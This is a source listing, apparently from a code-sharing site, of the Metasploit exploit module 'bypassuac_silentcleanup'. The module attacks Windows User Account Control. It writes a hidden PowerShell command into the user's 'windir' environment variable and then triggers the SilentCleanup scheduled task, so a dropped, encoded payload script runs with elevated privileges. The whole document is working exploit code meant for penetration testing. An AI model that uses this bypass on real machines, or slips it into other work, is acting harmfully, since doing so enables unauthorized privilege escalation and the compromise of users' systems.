Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/bypassuac_silentcleanup.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Powershell

10
  include Msf::Post::Windows::Priv

11
  include Msf::Post::File

12
  include Msf::Exploit::FileDropper

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',

19
        'Description' => %q{

20
          There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.

21
          When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,

22
          %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'tyranid', # Discovery

27
          'enigma0x3', # Discovery

28
          'nyshone69', # Discovery

29
          'lokiuox', # PSH script

30
          'Carter Brainerd (cbrnrd)' # Metasploit Module

31
        ],

32
        'Platform' => ['win'],

33
        'SessionTypes' => ['meterpreter', 'shell'],

34
        'Arch' => [ARCH_X86, ARCH_X64],

35
        'Targets' => [['Microsoft Windows', {}]],

36
        'DisclosureDate' => '2019-02-24',

37
        'References' => [

38
          ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],

39
          ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],

40
          ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],

41
          ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']

42
        ],

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),

54
        OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"])

55
      ]

56
    )

57
  end

58


59
  def get_bypass_script(cmd)

60
    scr = %Q{

61
      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {

62
        $env:windir = [System.Environment]::GetEnvironmentVariable("windir", "machine")

63
        #{cmd}

64
      } else {

65
          $registryPath = "HKCU:\\Environment"

66
          $Name = "windir"

67
          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"

68
          Set-ItemProperty -Path $registryPath -Name $name -Value $Value

69
          #Depending on the performance of the machine, some sleep time may be required before or after schtasks

70
          Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}

71
          schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null

72
          Remove-ItemProperty -Path $registryPath -Name $name

73
      }

74
    }

75
    vprint_status(scr)

76
    scr

77
  end

78


79
  def exploit

80
    check_permissions

81


82
    e_vars = get_envs('TEMP')

83
    payload_fp = "#{e_vars['TEMP']}\\#{rand_text_alpha(8)}.ps1"

84


85
    # Write it to disk, run, delete

86
    upload_payload_ps1(payload_fp)

87
    vprint_good("Payload uploaded to #{payload_fp}")

88


89
    cmd_exec("#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}")

90
  end

91


92
  def check_permissions

93
    # Check if you are an admin

94
    case is_in_admin_group?

95
    when nil

96
      print_error('Either whoami is not there or failed to execute')

97
      print_error('Continuing under assumption you already checked...')

98
    when true

99
      print_good('Part of Administrators group! Continuing...')

100
    when false

101
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

102
    end

103


104
    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]

105
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')

106
    end

107
  end

108


109
  def upload_payload_ps1(filepath)

110
    pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)

111
    begin

112
      vprint_status('Uploading payload PS1...')

113
      write_file(filepath, get_bypass_script(pld))

114
      register_file_for_cleanup(filepath)

115
    rescue Rex::Post::Meterpreter::RequestError => e

116
      fail_with(Failure::Unknown, "Error uploading file #{filepath}: #{e.class} #{e}")

117
    end

118
  end

119
end

120


121